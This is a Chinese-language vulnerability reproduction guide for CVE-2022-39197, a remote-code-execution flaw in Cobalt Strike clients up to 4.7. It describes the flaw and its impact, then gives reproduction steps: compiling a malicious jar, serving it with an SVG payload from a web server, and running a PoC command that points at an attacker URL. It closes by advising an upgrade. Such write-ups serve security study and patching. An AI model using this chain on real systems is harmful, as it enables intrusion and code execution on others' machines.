Cobalt_Strike <4.7.1 RCE (CVE-2022-39197)
01漏洞介绍
Cobalt Strike (CS) 是一个为对手模拟和红队行动而设计的平台,相当于增强版的Armitage,早期以Metasploit为基础框架,3.0版本之后作为独立平台开发,主要用于目标攻击和模拟后渗透行动。CS集成了端口转发、服务扫描、端口监听、木马生成、钓鱼攻击等功能,可以调用Mimikatz、Psexec等工具,与MSF进行联动,使用插件扩展功能,并且可以利用Malleable C2 profile 自定义通信流量特征,是内网大杀器,十分适合作为团队协同攻击工具使用。
由于Cobalt Strike 使用 GUI 框架 SWING开发,未经身份验证的远程攻击者可通过在 beacon 元数据中注入恶意 HTML 标签,与 Cobalt Strike 进行通信时,使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码。
02漏洞危害
1、导致命令执行,服务器被入侵
2、内网被渗透,导致数据被窃取等风险
3、用户获取到使用Cobalt Strike的攻击者的木马样本后,反制正在使用Cobalt Strike 客户端的攻击者
03受影响的版本
Cobalt Strike <= 4.7
04漏洞复现
准备工具
1、Cobalt_Strike木马样本文件
2、漏洞验证POC/EXP
下载地址:https://github.com/its-arun/CVE-2022-39197
1、编辑恶意文件内容
编辑EvilJar\src\main\java\Exploit.java,更改第19行代码参数,我们本着验证的目的,就默认即可
2、编译文件
使用IDEA进行编译,具体步骤如图所示
编译完成后会在target目录下生成EvilJar-1.0-jar-with-dependencies.jar文件,也就是我们编译好的恶意文件
3、移动文件位置
将生成的恶意文件拷贝至serve路径下,同时将木马样本放在与cve-2022-39197.py脚本同一路径下
4、在serve路径下开启一个web服务
目标服务器可以访问即可
5、编辑evil.svg文件,将[attacker]替换为当前路径启用的web地址
6、执行POC脚本
python3 cve-2022-39197.py beacon.exe http://192.168.88.1:8080/evil.svg
运行后,cs客户端上可以看到此时木马已经成功上线
如果CS用户尝试获取用户会话的进程列表
当滚动进程列表点击当前会话所在进程时即触发xss,请求攻击者web服务上的evil.svg文件,而evil.svg文件又继续加载请求恶意文件EvilJar-1.0-jar-with-dependencies.jar,成功执行命令,从而达到RCE。
注意
运行了脚本后不要中途直接按Ctrl+C退出,这样不会结束木马的进程,木马程序还在后台运行着,让脚本自己结束或者自己手动结束进程,脚本运行100秒后会自动结束木马进程
展示
05修复建议
升级至 Cobalt Strike 4.7.2版本
相关jar包可在公众号获取